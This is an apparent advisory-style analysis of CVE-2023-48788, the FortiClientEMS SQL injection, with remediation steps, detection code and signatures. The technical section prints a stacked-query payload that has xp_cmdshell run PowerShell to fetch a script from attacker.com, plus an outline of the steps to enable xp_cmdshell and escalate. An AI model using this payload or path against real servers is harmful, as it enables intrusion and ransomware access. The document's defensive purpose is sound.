Background
Fortinet FortiClientEMS (Endpoint Management Server) is the centralised management server for Fortinet’s FortiClient endpoint security software. Organisations use FortiClientEMS to deploy, configure, and monitor FortiClient agents on endpoint devices across their network. EMS servers typically have access to all managed endpoints and can push configuration changes, software updates, and policies to those endpoints — making them high-value targets for lateral movement and widespread access.
CVE-2023-48788 is a CVSS 9.8 SQL injection vulnerability in FortiClientEMS, disclosed in March 2024. Unlike many SQL injection vulnerabilities that are limited to data extraction, this vulnerability enables code execution through SQL Server’s extended stored procedures, specifically xp_cmdshell. CISA confirmed active exploitation after multiple ransomware groups incorporated the vulnerability into their attack chains.
Technical Mechanism
CVE-2023-48788 is a SQL injection in the FortiClientEMS server’s DAS (Database Access Server) component. FortiClientEMS runs on Windows Server and uses Microsoft SQL Server as its backend database.
The vulnerable component processes data from FortiClient agents connecting to the EMS server. Specifically, certain fields in the agent registration or heartbeat communication are passed to SQL queries without adequate parameterisation:
```sql
-- Vulnerable query (conceptual representation)
SELECT * FROM endpoints WHERE hostname = '<agent_supplied_hostname>'

-- Malicious agent data:
-- hostname = '; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"'--

-- Resulting query: the leading quote closes the literal, a second statement is
-- stacked after the semicolon, and the trailing -- comments out the original
-- closing quote so the batch still parses.
SELECT * FROM endpoints WHERE hostname = '';
EXEC xp_cmdshell 'powershell -c "IEX(...)"'--'
```
xp_cmdshell is a SQL Server extended stored procedure that executes Windows shell commands. When enabled (or when the attacker can enable it via sp_configure), SQL injection with stacked queries allows direct OS command execution.
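To make the root cause concrete, here is an added illustration that is not Fortinet's code and does not reproduce the DAS component; the `endpoints` table, the hostname values, the helper functions and the use of an in-memory SQLite database are all constructed for this example. It runs the same lookup two ways: string concatenation, which turns an agent-supplied hostname into a second statement, and a parameterised query, which keeps the whole value inside one string literal. A small quote-aware splitter shows how many statements a batch parser would see in each case, and a hostname validator shows the defence-in-depth check that belongs in front of the database layer.

```python
import re
import sqlite3

# Constructed sample values for this illustration (not taken from any real agent).
# The malicious value closes the string literal, stacks a second statement and
# comments out whatever the original query appended after the value.
BENIGN_HOSTNAME = "ws-finance-07"
MALICIOUS_HOSTNAME = "'; EXEC xp_cmdshell 'whoami'--"

# RFC 1123-style hostname: labels of letters, digits and hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_query_unsafe(hostname: str) -> str:
    """Mirror of the vulnerable pattern: the value is pasted into the SQL text."""
    return f"SELECT * FROM endpoints WHERE hostname = '{hostname}'"


def split_statements(sql: str) -> list:
    """Count statements the way a batch parser would: split on ';' outside
    single-quoted literals and stop at a '--' line comment. Deliberately simple
    (no block comments or bracketed identifiers); enough to show the stacking."""
    statements, current, in_literal, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            in_literal = not in_literal
        elif not in_literal and sql.startswith("--", i):
            break  # rest of the batch is a comment
        elif ch == ";" and not in_literal:
            statements.append("".join(current).strip())
            current = []
            i += 1
            continue
        current.append(ch)
        i += 1
    tail = "".join(current).strip()
    if tail:
        statements.append(tail)
    return [s for s in statements if s]


def statements_seen(hostname: str) -> int:
    """How many statements the unsafe construction hands to the engine."""
    return len(split_statements(build_query_unsafe(hostname)))


def is_valid_hostname(hostname: str) -> bool:
    """Defence in depth: reject values that cannot be a hostname before they
    reach the database layer. Parameterisation is the actual fix; this only
    shrinks the attack surface further."""
    return HOSTNAME_RE.fullmatch(hostname) is not None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory endpoint table standing in for the EMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE endpoints (hostname TEXT, last_seen TEXT)")
    conn.execute("INSERT INTO endpoints VALUES (?, ?)", (BENIGN_HOSTNAME, "2024-03-14"))
    conn.commit()
    return conn


def lookup_endpoint_safe(conn: sqlite3.Connection, hostname: str) -> list:
    """Parameterised form: the value travels separately from the SQL text, so it
    can neither terminate the literal nor add a statement."""
    return conn.execute(
        "SELECT hostname, last_seen FROM endpoints WHERE hostname = ?", (hostname,)
    ).fetchall()


if __name__ == "__main__":
    conn = demo_db()
    for name in (BENIGN_HOSTNAME, MALICIOUS_HOSTNAME):
        print(f"{name!r}: valid={is_valid_hostname(name)} "
              f"unsafe_statements={statements_seen(name)} "
              f"parameterised_rows={lookup_endpoint_safe(conn, name)}")
```

The concatenated form yields two statements for the malicious value, while the parameterised lookup simply finds no endpoint with that literal name. SQLite is used only because it ships with Python; the same distinction holds for SQL Server drivers that bind parameters (for example `?` placeholders in pyodbc), where stacked statements in a bound value are never interpreted as SQL.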
The attack path:
- Discover EMS server: FortiClientEMS typically runs on port 8013 (TCP) and has a web management UI
- Craft malicious request: Send a request mimicking a FortiClient agent registration/heartbeat with SQL injection payload in the hostname or other fields
- Enable xp_cmdshell if needed: If disabled, use `sp_configure 'xp_cmdshell', 1; RECONFIGURE` within the injection
- Execute commands: Use `EXEC xp_cmdshell` to run PowerShell or CMD commands in the context of the SQL Server service account
- Escalate: SQL Server often runs as NETWORK SERVICE or LOCAL SYSTEM; use privilege escalation techniques for full SYSTEM access if needed
The EMS server also has access to the FortiClient management API, allowing an attacker with EMS control to push malicious configurations or software to all managed endpoints.
Real-World Exploitation Evidence
Horizon3.ai and other security firms published detailed technical analyses confirming that CVE-2023-48788 is straightforwardly exploitable. In-the-wild exploitation was confirmed:
- Ransomware campaigns: Multiple ransomware operators used CVE-2023-48788 for initial access, particularly targeting organisations in manufacturing, healthcare, and professional services that heavily use FortiClient endpoint security.
- Exploitation within days of advisory: Working PoC exploits were published within days of the March 2024 advisory, leading to rapid uptake by criminal threat actors.
- EMS as pivot point: Post-exploitation, attackers used EMS’s management capabilities to deploy additional malware to all endpoints managed by the compromised EMS server — a highly efficient lateral movement technique.
- Credential harvesting: FortiClientEMS databases contain endpoint inventory data, user-device mappings, and potentially credential information used for EMS-endpoint authentication.
Impact Assessment
The cascading impact from an EMS server compromise is significant:
- Command execution on EMS host: SQL Server code execution provides Windows OS command execution on the EMS server.
- All-endpoint access: EMS has management authority over all FortiClient-managed endpoints; attackers can leverage EMS to push malicious scripts or configurations to every managed endpoint.
- Endpoint security blind spot: An attacker controlling EMS can modify FortiClient configurations to disable endpoint security features, exclude directories from scanning, or uninstall FortiClient entirely.
- VPN credential access: FortiClientEMS manages VPN configurations; stored pre-shared keys and credentials may be accessible.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| FortiClientEMS 7.2 | 7.2.0 – 7.2.2 | 7.2.3+ |
| FortiClientEMS 7.0 | 7.0.1 – 7.0.10 | 7.0.11+ |
| FortiClientEMS 6.4 | All | No fix (EOL — migrate to 7.x) |
Remediation Steps
- Apply patches: Upgrade FortiClientEMS to the fixed versions. The update is available from the Fortinet Customer Support portal.
- Restrict network access to EMS: The EMS management server should not be internet-facing. Confirm that:
  - Port 8013 (EMS management) is not accessible from the internet
  - Access is limited to internal management networks
- Review SQL Server configuration:

  ```sql
  -- Check xp_cmdshell status (value = configured setting, value_in_use = setting currently active)
  SELECT name, value, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

  -- Check for unexpected SQL Server logins (S = SQL login, U = Windows login)
  SELECT name, type_desc, is_disabled, create_date
  FROM sys.server_principals
  WHERE type IN ('S', 'U')
  ORDER BY create_date DESC;
  ```

- Check for IOCs on the EMS host:
  - Review Windows Event Logs for unusual process creation events (Event ID 4688)
  - Check for PowerShell execution history: `Get-PSReadlineOption | Select HistorySavePath` shows the history file for the current user only. PSReadline history is per user and is written only by interactive sessions, so commands launched via `powershell -c` under the SQL Server service account will usually not appear there; for those, rely on Event ID 4688 with command-line auditing and on PowerShell script block logging (Event ID 4104).
  - Audit EMS database for unexpected entries in endpoint tables
- Run endpoint audit: If EMS compromise is confirmed, audit all managed FortiClient endpoints for unauthorised configuration changes or malware deployment.
Detection Guidance
Log sources:
- Windows Event Logs (Security, System, Application) on the EMS server
- SQL Server error logs: `C:\Program Files\Microsoft SQL Server\MSSQL[version]\MSSQL\Log\ERRORLOG`
- FortiClientEMS application logs: `C:\Program Files\Fortinet\FortiClientEMS\logs\`
SQL Server suspicious activity:
```sql
-- Check for xp_cmdshell usage in the plan cache
SELECT TOP 100 qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%xp_cmdshell%'
ORDER BY qs.last_execution_time DESC;
```

This only sees plans still in the cache: a service restart or cache eviction removes the evidence, so run it early and preserve the output. Absence of results does not prove xp_cmdshell was never called; the SQL Server error log and Windows process creation events are the durable sources.
Windows Event Log signatures:
- Event ID 4688 (Process Creation): `sqlservr.exe` spawning `cmd.exe` or `powershell.exe`. This event is only written when Audit Process Creation is enabled in the advanced audit policy, and the command line appears only when "Include command line in process creation events" is also turned on; without the latter the parent/child pair is still visible.
- Event ID 7045 (Service Installation): New services installed around time of exploitation
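The two host-based signatures above, plus the plan-cache query, as an added detection example (not part of the original page and not a Fortinet or Microsoft tool). The event records and SQL text rows are constructed samples shaped like Event ID 4688/7045 data and like the output of the `sys.dm_exec_sql_text` query; the field names `ParentProcessName`, `NewProcessName`, `CommandLine`, `ServiceName` and `ImagePath` follow the Windows event schema, while the rule names, the trusted-directory list and the SQL Server install path are assumptions for the example.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SQL_SERVER_IMAGE = "sqlservr.exe"
# Markers of the stacked-query abuse in captured SQL text (case-insensitive).
SQL_MARKERS = re.compile(r"xp_cmdshell|show advanced options", re.IGNORECASE)
# Assumed allowlist of directories a service binary is expected to live in.
TRUSTED_SERVICE_DIRS = (r"c:\windows\system32", r"c:\program files")

# Constructed sample events (not real telemetry) shaped like 4688 and 7045 records.
SAMPLE_EVENTS = [
    {"EventID": 4688,
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "powershell -c whoami"'},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 7045, "ServiceName": "WinUpdateSvc", "ImagePath": r'"C:\Windows\Temp\svc.exe"'},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

# Constructed rows shaped like the dm_exec_sql_text query output.
SAMPLE_SQL_TEXT = [
    {"last_execution_time": "2024-03-14 02:11:09",
     "text": "SELECT * FROM endpoints WHERE hostname = ''; EXEC xp_cmdshell 'whoami'--'"},
    {"last_execution_time": "2024-03-14 02:10:55",
     "text": "EXEC sp_configure 'show advanced options', 1; RECONFIGURE"},
    {"last_execution_time": "2024-03-13 23:00:01", "text": "SELECT name FROM sys.databases"},
]


@dataclass
class Alert:
    rule: str
    severity: str
    detail: str


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_process_creation(event: dict) -> Optional[Alert]:
    """Event ID 4688: the SQL Server process spawning a command shell."""
    if event.get("EventID") != 4688:
        return None
    parent = _basename(event.get("ParentProcessName", ""))
    child = _basename(event.get("NewProcessName", ""))
    if parent == SQL_SERVER_IMAGE and child in SHELLS:
        cmd = event.get("CommandLine", "<command line not audited>")
        return Alert("sqlservr_spawns_shell", "high", f"{parent} -> {child}: {cmd}")
    return None


def check_service_install(event: dict) -> Optional[Alert]:
    """Event ID 7045: a new service whose binary lives outside trusted directories."""
    if event.get("EventID") != 7045:
        return None
    image = event.get("ImagePath", "").strip('"').lower()
    if not image.startswith(TRUSTED_SERVICE_DIRS):
        return Alert("service_from_untrusted_path", "medium",
                     f"service '{event.get('ServiceName')}' image {image}")
    return None


def scan_events(events: list) -> list:
    """Run every host check over a list of event records, preserving order."""
    alerts = []
    for ev in events:
        for check in (check_process_creation, check_service_install):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


def scan_sql_text(rows: list) -> list:
    """Flag plan-cache text that references xp_cmdshell or the option that enables it."""
    return [Alert("xp_cmdshell_in_plan_cache", "high",
                  f"{row['last_execution_time']}: {row['text'][:80]}")
            for row in rows if SQL_MARKERS.search(row["text"])]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS) + scan_sql_text(SAMPLE_SQL_TEXT):
        print(f"[{alert.severity}] {alert.rule}: {alert.detail}")
```

In production the records would come from the Security and System logs (for example via `Get-WinEvent` exported as JSON) and the SQL rows from the query in the previous section; the rule logic is the same. The benign `svchost.exe -> powershell.exe` record shows why the parent image, not the child alone, is the discriminator: PowerShell launched by a scheduled task is routine, PowerShell launched by `sqlservr.exe` is not.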
Suricata signature:
```
alert tcp $EXTERNAL_NET any -> $HOME_NET 8013 (msg:"Fortinet FortiClientEMS CVE-2023-48788 SQL Injection Probe"; flow:established,to_server; content:"xp_cmdshell"; nocase; sid:9002348; rev:1;)
```

The agent-to-EMS channel on port 8013 is normally TLS-encrypted, so this plaintext content match will only fire where the sensor sees decrypted traffic or where a probe is sent in the clear. Treat it as a low-confidence supplement to the host-based checks above rather than as the primary detection.
Timeline
| Date | Event |
|---|---|
| March 12, 2024 | Fortinet publishes advisory; patches released |
| March 12, 2024 | CISA adds CVE-2023-48788 to KEV catalogue |
| March 14, 2024 | Horizon3.ai publishes technical analysis and PoC |
| March 2024 | Exploitation by multiple threat actors confirmed |
| April 2024 | Ransomware campaigns using CVE-2023-48788 documented |